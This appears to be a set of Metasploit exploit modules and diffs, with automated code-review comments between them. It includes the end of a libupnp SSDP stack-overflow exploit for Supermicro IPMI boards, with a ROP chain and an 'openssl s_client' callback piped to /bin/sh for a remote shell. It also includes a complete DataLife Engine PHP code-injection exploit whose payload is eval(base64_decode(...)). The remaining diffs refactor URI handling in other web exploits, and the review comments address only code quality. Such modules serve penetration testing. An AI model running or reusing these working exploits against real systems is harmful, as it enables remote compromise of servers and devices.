'License' => MSF_LICENSE,
'References' =>
[
[ 'CVE', '2012-5958' ],
[ 'US-CERT-VU', '922681' ],
[ 'URL', 'https://community.rapid7.com/community/infosec/blog/2013/01/29/security-flaws-in-universal-plug-and-play-unplug-dont-play' ]
],
'Platform' => ['unix'],
'Arch' => ARCH_CMD,
'Privileged' => true,
'Payload' =>
{
#
# # The following BadChars do not apply since we stage the payload
# # through a secondary connection. This is just for reference.
#
# 'BadChars' =>
# # Bytes 0-8 are not allowed
# [*(0..8)].pack("C*") +
# # 0x09, 0x0a, 0x0d are allowed
# "\x0b\x0c\x0e\x0f" +
# # All remaining bytes up to space are restricted
# [*(0x10..0x1f)].pack("C*") +
# # Also not allowed
# "\x7f\x3a" +
# # Breaks our string quoting
# "\x22",
# Unlimited since we stage this over a secondary connection
'Space' => 8000,
'DisableNops' => true,
'Compat' =>
{
'PayloadType' => 'cmd',
# specific payloads vary widely by device (openssl for IPMI, etc)
}
},
'Targets' =>
[
[ "Automatic", { } ],
#
# ROP targets are difficult to represent in the hash, use callbacks instead
#
[ "Supermicro Onboard IPMI (X9SCL/X9SCM) Intel SDK 1.3.1", {
# The callback handles all target-specific settings
:callback => :target_supermicro_ipmi_131,
# This matches any line of the SSDP M-SEARCH response
:fingerprint =>
/Server:\s*Linux\/2\.6\.17\.WB_WPCM450\.1\.3 UPnP\/1\.0, Intel SDK for UPnP devices\/1\.3\.1/mi
#
# SSDP response:
# Linux/2.6.17.WB_WPCM450.1.3 UPnP/1.0, Intel SDK for UPnP devices/1.3.1
# http://192.168.xx.xx:49152/IPMIdevicedesc.xml
# uuid:Upnp-IPMI-1_0-1234567890001::upnp:rootdevice
# Approximately 35,000 of these found in the wild via critical.io scans (2013-02-03)
} ],
[ "Debug Target", {
# The callback handles all target-specific settings
:callback => :target_debug
} ]
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Jan 29 2013'))
register_options(
[
Opt::RHOST(),
Opt::RPORT(1900),
OptAddress.new('CBHOST', [ false, "The listener address used for staging the real payload" ]),
OptPort.new('CBPORT', [ false, "The listener port used for staging the real payload" ])
], self.class)
end
def exploit
configure_socket
target_info = choose_target
unless self.respond_to?(target_info[:callback])
print_error("Invalid target specified: no callback function defined")
return
end
buffer = self.send(target_info[:callback])
pkt =
"M-SEARCH * HTTP/1.1\r\n" +
"Host:239.255.255.250:1900\r\n" +
"ST:uuid:schemas:device:" + buffer + ":end\r\n" +
"Man:\"ssdp:discover\"\r\n" +
"MX:3\r\n\r\n"
print_status("Exploiting #{rhost} with target '#{target_info.name}' with #{pkt.length} bytes to port #{rport}...")
r = udp_sock.sendto(pkt, rhost, rport, 0)
1.upto(5) do
::IO.select(nil, nil, nil, 1)
break if session_created?
end
# No handler() support right now
end
# These devices are armle, run version 1.3.1 of libupnp, have random stacks, but no PIE on libc
def target_supermicro_ipmi_131
# Create a fixed-size buffer for the payload
buffer = Rex::Text.rand_text_alpha(2000)
# Place the entire buffer inside of double-quotes to take advantage of is_qdtext_char()
buffer[0,1] = '"'
buffer[1999,1] = '"'
# Prefer CBHOST, but use LHOST, or autodetect the IP otherwise
cbhost = datastore['CBHOST'] || datastore['LHOST'] || Rex::Socket.source_address(datastore['RHOST'])
# Start a listener
start_listener(true)
# Figure out the port we picked
cbport = self.service.getsockname[2]
# Restart the service and use openssl to stage the real payload
# Staged because only ~150 bytes of contiguous data are available before mangling
cmd = "sleep 1;/bin/upnp_dev & echo; openssl s_client -quiet -host #{cbhost} -port #{cbport}|/bin/sh;exit;#"
buffer[432, cmd.length] = cmd
# Adjust $r3 to point from the bottom of the stack back into our buffer
buffer[304,4] = [0x4009daf8].pack("V") #
# 0x4009daf8: add r3, r3, r4, lsl #2
# 0x4009dafc: ldr r0, [r3, #512] ; 0x200
# 0x4009db00: pop {r4, r10, pc}
# The offset (right-shifted by 2 ) to our command string above
buffer[284,4] = [0xfffffe78].pack("V") #
# Copy $r3 into $r0
buffer[316,4] = [0x400db0ac].pack("V")
# 0x400db0ac <_IO_wfile_underflow+1184>: sub r0, r3, #1
# 0x400db0b0 <_IO_wfile_underflow+1188>: pop {pc} ; (ldr pc, [sp], #4)
# Move our stack pointer down so as not to corrupt our payload
buffer[320,4] = [0x400a5568].pack("V")
# 0x400a5568 <__default_rt_sa_restorer_v2+5448>: add sp, sp, #408 ; 0x198
# 0x400a556c <__default_rt_sa_restorer_v2+5452>: pop {r4, r5, pc}
# Finally return to system() with $r0 pointing to our string
buffer[141,4] = [0x400add8c].pack("V")
return buffer
=begin
00008000-00029000 r-xp 00000000 08:01 709233 /bin/upnp_dev
00031000-00032000 rwxp 00021000 08:01 709233 /bin/upnp_dev
00032000-00055000 rwxp 00000000 00:00 0 [heap]
40000000-40015000 r-xp 00000000 08:01 709562 /lib/ld-2.3.5.so
40015000-40017000 rwxp 00000000 00:00 0
4001c000-4001d000 r-xp 00014000 08:01 709562 /lib/ld-2.3.5.so
4001d000-4001e000 rwxp 00015000 08:01 709562 /lib/ld-2.3.5.so
4001e000-4002d000 r-xp 00000000 08:01 709535 /lib/libpthread-0.10.so
4002d000-40034000 ---p 0000f000 08:01 709535 /lib/libpthread-0.10.so
40034000-40035000 r-xp 0000e000 08:01 709535 /lib/libpthread-0.10.so
40035000-40036000 rwxp 0000f000 08:01 709535 /lib/libpthread-0.10.so
40036000-40078000 rwxp 00000000 00:00 0
40078000-40180000 r-xp 00000000 08:01 709620 /lib/libc-2.3.5.so
40180000-40182000 r-xp 00108000 08:01 709620 /lib/libc-2.3.5.so
40182000-40185000 rwxp 0010a000 08:01 709620 /lib/libc-2.3.5.so
40185000-40187000 rwxp 00000000 00:00 0
bd600000-bd601000 ---p 00000000 00:00 0
bd601000-bd800000 rwxp 00000000 00:00 0
bd800000-bd801000 ---p 00000000 00:00 0
bd801000-bda00000 rwxp 00000000 00:00 0
bdc00000-bdc01000 ---p 00000000 00:00 0
bdc01000-bde00000 rwxp 00000000 00:00 0
be000000-be001000 ---p 00000000 00:00 0
be001000-be200000 rwxp 00000000 00:00 0
be941000-be956000 rwxp 00000000 00:00 0 [stack]
=end
end
# Generate a buffer that provides a starting point for exploit development
def target_debug
buffer = Rex::Text.pattern_create(2000)
end
def stage_real_payload(cli)
print_good("Sending payload of #{payload.encoded.length} bytes to #{cli.peerhost}:#{cli.peerport}...")
cli.put(payload.encoded + "\n")
end
def start_listener(ssl = false)
comm = datastore['ListenerComm']
if comm == "local"
comm = ::Rex::Socket::Comm::Local
else
comm = nil
end
self.service = Rex::Socket::TcpServer.create(
'LocalPort' => datastore['CBPORT'],
'SSL' => ssl,
'SSLCert' => datastore['SSLCert'],
'Comm' => comm,
'Context' =>
{
'Msf' => framework,
'MsfExploit' => self,
})
self.service.on_client_connect_proc = Proc.new { |client|
stage_real_payload(client)
}
# Start the listening service
self.service.start
end
#
# Shut down any running services
#
def cleanup
super
if self.service
print_status("Shutting down payload stager listener...")
begin
self.service.deref if self.service.kind_of?(Rex::Service)
if self.service.kind_of?(Rex::Socket)
self.service.close
self.service.stop
end
self.service = nil
rescue ::Exception
end
end
end
def choose_target
# If the user specified a target, use that one
return self.target unless self.target.name =~ /Automatic/
msearch =
"M-SEARCH * HTTP/1.1\r\n" +
"Host:239.255.255.250:1900\r\n" +
"ST:upnp:rootdevice\r\n" +
"Man:\"ssdp:discover\"\r\n" +
"MX:3\r\n\r\n"
# Fingerprint the service through SSDP
udp_sock.sendto(msearch, rhost, rport, 0)
res = nil
1.upto(5) do
res,addr,info = udp_sock.recvfrom(65535, 1.0)
break if res and res =~ /^(Server|Location)/mi
udp_sock.sendto(msearch, rhost, rport, 0)
end
self.targets.each do |t|
return t if t[:fingerprint] and res =~ t[:fingerprint]
end
if res and res.to_s.length > 0
print_status("No target matches this fingerprint")
print_status("")
res.to_s.split("\n").each do |line|
print_status(" #{line.strip}")
end
print_status("")
else
print_status("The system #{rhost} did not reply to our M-SEARCH probe")
end
fail_with(Exploit::Failure::NoTarget, "No compatible target detected")
end
# Accessor for our TCP payload stager
attr_accessor :service
# We need an unconnected socket because SSDP replies often come
# from a different sent port than the one we sent to. This also
# breaks the standard UDP mixin.
def configure_socket
self.udp_sock = Rex::Socket::Udp.create({
'Context' => { 'Msf' => framework, 'MsfExploit' => self }
})
add_socket(self.udp_sock)
end
#
# Required since we aren't using the normal mixins
#
def rhost
datastore['RHOST']
end
def rport
datastore['RPORT']
end
# Accessor for our UDP socket
attr_accessor :udp_sock
end


@ -61,12 +61,11 @@ class Metasploit3 < Msf::Exploit::Remote
def check
base = normalize_uri(target_uri.path)
base << '/' if base[-1, 1] != '/'
sig = rand_text_alpha(10)
res = send_request_cgi({
'uri' => "/#{base}/Config/diff.php",
'uri' => normalize_uri("/#{base}/Config/diff.php"),
'vars_get' => {
'file' => sig,
'new' => '1',
@ -86,10 +85,9 @@ class Metasploit3 < Msf::Exploit::Remote
print_status("Sending GET request...")
base = normalize_uri(target_uri.path)
base << '/' if base[-1, 1] != '/'
res = send_request_cgi({
'uri' => "/#{base}/Config/diff.php",
'uri' => normalize_uri("/#{base}/Config/diff.php"),
'vars_get' => {
'file' => "&#{payload.encoded} #",
'new' => '1',
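Review bot: The new 'uri' value normalizes a path that is already normalized: `base` comes from `normalize_uri(target_uri.path)` and gets a trailing slash appended, and is then wrapped in a leading "/" and passed through `normalize_uri` a second time, so the `base << '/'` line and the interpolation are doing work the helper already does. The other files in this commit use the multi-argument form, and the same shape would do here, `'uri' => normalize_uri(target_uri.path, 'Config', 'diff.php')`, which also drops the in-place mutation of the string `normalize_uri` returned. The second hunk of this file has the identical pattern. Both enclosing methods continue outside the hunk.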


@ -71,7 +71,7 @@ class Metasploit3 < Msf::Exploit::Remote
def check
res = send_request_raw({
'uri' => normalize_uri(datastore['URI']) + '/picEditor.php'
'uri' => normalize_uri(datastore['URI'], '/picEditor.php')
}, 25)
if (res and res.body =~ /Coppermine Picture Editor/i)
@ -98,7 +98,7 @@ class Metasploit3 < Msf::Exploit::Remote
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(datastore['URI']) + "/picEditor.php",
'uri' => normalize_uri(datastore['URI'], "/picEditor.php"),
'vars_post' =>
{
'angle' => angle,


@ -0,0 +1,95 @@
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'DataLife Engine preview.php PHP Code Injection',
'Description' => %q{
This module exploits a PHP code injection vulnerability DataLife Engine 9.7.
The vulnerability exists in preview.php, due to an insecure usage of preg_replace()
with the e modifier, which allows to inject arbitrary php code, when there is a
template installed which contains a [catlist] or [not-catlist] tag, even when the
template isn't in use currently. The template can be configured with the TEMPLATE
datastore option.
},
'Author' =>
[
'EgiX', # Vulnerability discovery
'juan vazquez' # Metasploit module
],
'License' => MSF_LICENSE,
'References' =>
[
[ 'CVE', '2013-1412' ],
[ 'BID', '57603' ],
[ 'EDB', '24438' ],
[ 'URL', 'http://karmainsecurity.com/KIS-2013-01' ],
[ 'URL', 'http://dleviet.com/dle/bug-fix/3281-security-patches-for-dle-97.html' ]
],
'Privileged' => false,
'Platform' => ['php'],
'Arch' => ARCH_PHP,
'Payload' =>
{
'Keys' => ['php']
},
'DisclosureDate' => 'Jan 28 2013',
'Targets' => [ ['DataLife Engine 9.7', { }], ],
'DefaultTarget' => 0
))
register_options(
[
OptString.new('TARGETURI', [ true, "The base path to the web application", "/"]),
OptString.new('TEMPLATE', [ true, "Template with catlist or not-catlit tag", "Default"])
], self.class)
end
def uri
normalize_uri(target_uri.path, 'engine', 'preview.php')
end
def send_injection(inj)
res = send_request_cgi(
{
'uri' => uri,
'method' => 'POST',
'vars_post' =>
{
'catlist[0]' => inj
},
'cookie' => "dle_skin=#{datastore['TEMPLATE']}"
})
res
end
def check
fingerprint = rand_text_alpha(4+rand(4))
res = send_injection("#{rand_text_alpha(4+rand(4))}')||printf(\"#{fingerprint}\");//")
if res and res.code == 200 and res.body =~ /#{fingerprint}/
return Exploit::CheckCode::Vulnerable
else
return Exploit::CheckCode::Safe
end
end
def exploit
@peer = "#{rhost}:#{rport}"
print_status("#{@peer} - Exploiting the preg_replace() to execute PHP code")
res = send_injection("#{rand_text_alpha(4+rand(4))}')||eval(base64_decode(\"#{Rex::Text.encode_base64(payload.encoded)}\"));//")
end
end
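Review bot: `check` reports Safe whenever the request gets no response or a non-200 status, which conflates "not vulnerable" with "could not tell"; the `else` branch should return `Exploit::CheckCode::Unknown` when `res` is nil and reserve Safe for a real reply without the marker. On the match itself, `res.body =~ /#{fingerprint}/` builds a regex from the marker for what is a plain substring test, so `res.body.include?(fingerprint)` says the same thing more directly. In `exploit` the `res` assignment is never read, and `send_injection` ends with a redundant bare `res` after the assignment, so both could simply return the `send_request_cgi` call. The TEMPLATE option description also has a typo, "not-catlit" for "not-catlist", which is the tag name the Description above uses.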


@ -58,12 +58,11 @@ class Metasploit3 < Msf::Exploit::Remote
end
def check
uri = normalize_uri(target_uri.path)
uri << '/' if uri[-1,1] != '/'
uri = target_uri.path
res = send_request_cgi({
'method' => 'GET',
'uri' => "#{uri}egallery/uploadify.php"
'uri' => normalize_uri(uri, "egallery", "uploadify.php")
})
if res and res.code == 200 and res.body.empty?
@ -97,7 +96,7 @@ class Metasploit3 < Msf::Exploit::Remote
print_status("#{peer} - Sending PHP payload (#{payload_name})")
res = send_request_cgi({
'method' => 'POST',
'uri' => "#{uri}egallery/uploadify.php",
'uri' => normalize_uri("#{uri}egallery/uploadify.php"),
'ctype' => "multipart/form-data; boundary=#{boundary}",
'data' => post_data
})
@ -113,7 +112,7 @@ class Metasploit3 < Msf::Exploit::Remote
# Execute our payload
res = send_request_cgi({
'method' => 'GET',
'uri' => "#{uri}#{payload_name}"
'uri' => normalize_uri("#{uri}#{payload_name}")
})
# If we don't get a 200 when we request our malicious payload, we suspect
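Review bot: The two exploit-side hunks still build the path by string interpolation, `normalize_uri("#{uri}egallery/uploadify.php")` and `normalize_uri("#{uri}#{payload_name}")`, which relies on `uri` ending in a slash; the assignment of `uri` in the exploit method is outside this hunk, and if it was changed the same way as `check` (to a bare `target_uri.path`) a base path without a trailing slash fuses with "egallery" and with the payload name. Using the multi-argument form as `check` now does, `normalize_uri(uri, 'egallery', 'uploadify.php')` and `normalize_uri(uri, payload_name)`, removes that dependency regardless of how `uri` is set. The enclosing exploit method starts and ends outside the hunks.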


@ -54,9 +54,8 @@ class Metasploit3 < Msf::Exploit::Remote
end
def check
uri = normalize_uri(datastore['URI'])
uri << '/' if uri[-1,1] != '/'
uri << 'plugins/editors/tinymce/jscripts/tiny_mce/plugins/tinybrowser/upload.php?type=file&folder='
uri = normalize_uri(datastore['URI'], 'plugins/editors/tinymce/jscripts/tiny_mce/plugins/tinybrowser/upload.php')
uri << '?type=file&folder='
res = send_request_raw(
{
'uri' => uri


@ -68,9 +68,7 @@ class Metasploit3 < Msf::Exploit::Remote
end
def check
uri = normalize_uri(datastore['URI'])
uri << '/' if uri[-1,1] != '/'
uri << 'www/admin/'
uri = normalize_uri(datastore['URI'], 'www', 'admin/')
res = send_request_raw(
{
'uri' => uri
@ -108,9 +106,7 @@ class Metasploit3 < Msf::Exploit::Remote
# Static files
img_dir = 'images/'
uri_base = normalize_uri(datastore['URI'])
uri_base << '/' if uri_base[-1,1] != '/'
uri_base << 'www/'
uri_base = normalize_uri(datastore['URI'], 'www/')
# Need to login first :-/
cookie = openx_login(uri_base)
@ -166,7 +162,7 @@ class Metasploit3 < Msf::Exploit::Remote
res = send_request_raw(
{
'uri' => uri_base + 'admin/index.php'
'uri' => normalize_uri(uri_base, 'admin/index.php')
}, 10)
if not (res and res.body =~ /oa_cookiecheck\" value=\"([^\"]+)\"/)
return nil
@ -176,7 +172,7 @@ class Metasploit3 < Msf::Exploit::Remote
res = send_request_cgi(
{
'method' => 'POST',
'uri' => uri_base + 'admin/index.php',
'uri' => normalize_uri(uri_base, 'admin/index.php'),
'vars_post' =>
{
'oa_cookiecheck' => cookie,
@ -201,7 +197,7 @@ class Metasploit3 < Msf::Exploit::Remote
def openx_find_campaign(uri_base, cookie)
res = send_request_raw(
{
'uri' => uri_base + 'admin/advertiser-campaigns.php',
'uri' => normalize_uri(uri_base, 'admin/advertiser-campaigns.php'),
'headers' =>
{
'Cookie' => "sessionID=#{cookie}; PHPSESSID=#{cookie}",
@ -269,7 +265,7 @@ class Metasploit3 < Msf::Exploit::Remote
res = send_request_raw(
{
'uri' => uri_base + "admin/banner-edit.php",
'uri' => normalize_uri(uri_base, "admin/banner-edit.php"),
'method' => 'POST',
'data' => data,
'headers' =>
@ -287,7 +283,7 @@ class Metasploit3 < Msf::Exploit::Remote
# Ugh, now we have to get the banner id!
res = send_request_raw(
{
'uri' => uri_base + "admin/campaign-banners.php?clientid=#{adv_id}&campaignid=#{camp_id}",
'uri' => normalize_uri(uri_base, "admin/campaign-banners.php") + "?clientid=#{adv_id}&campaignid=#{camp_id}",
'method' => 'GET',
'headers' =>
{
@ -319,7 +315,7 @@ class Metasploit3 < Msf::Exploit::Remote
# Ugh, now we have to get the banner name too!
res = send_request_raw(
{
'uri' => uri_base + "admin/banner-edit.php?clientid=#{adv_id}&campaignid=#{camp_id}&bannerid=#{ban_id}",
'uri' => normalize_uri(uri_base, "admin/banner-edit.php") + "?clientid=#{adv_id}&campaignid=#{camp_id}&bannerid=#{ban_id}",
'method' => 'GET',
'headers' =>
{
@ -338,7 +334,7 @@ class Metasploit3 < Msf::Exploit::Remote
def openx_banner_delete(uri_base, cookie, adv_id, camp_id, ban_id)
res = send_request_raw(
{
'uri' => uri_base + "admin/banner-delete.php?clientid=#{adv_id}&campaignid=#{camp_id}&bannerid=#{ban_id}",
'uri' => normalize_uri(uri_base, "admin/banner-delete.php") + "?clientid=#{adv_id}&campaignid=#{camp_id}&bannerid=#{ban_id}",
'method' => 'GET',
'headers' =>
{
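Review bot: The query strings in the campaign-banners, banner-edit and banner-delete requests interpolate `adv_id`, `camp_id` and `ban_id` unencoded, and the surrounding comments indicate these values are parsed out of the server's own responses, so an unexpected character in them ends up raw in the request line. Since the rest of this commit moved path handling onto `normalize_uri`, the query part could move onto the encoding helper the same way: `send_request_cgi` with `'vars_get' => { 'clientid' => adv_id, 'campaignid' => camp_id }` (plus `'bannerid' => ban_id` where used), which also removes the `+ "?..."` concatenation. This applies to all three GET hunks at the end of the section; the enclosing methods start and end outside them.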


@ -78,7 +78,7 @@ class Metasploit3 < Msf::Exploit::Remote
print_status("Sending file save request")
response = send_request_raw({
'uri' => normalize_uri(datastore['URI']) + "/" + "admin/file_manager.php/login.php?action=save",
'uri' => normalize_uri(datastore['URI'], "admin/file_manager.php/login.php") + "?action=save",
'method' => 'POST',
'data' => data,
'headers' =>
@ -101,7 +101,7 @@ class Metasploit3 < Msf::Exploit::Remote
response = send_request_raw({
# Allow findsock payloads to work
'global' => true,
'uri' => normalize_uri(datastore['URI']) + "/" + File.basename(filename)
'uri' => normalize_uri(datastore['URI'], File.basename(filename))
}, timeout)
handler
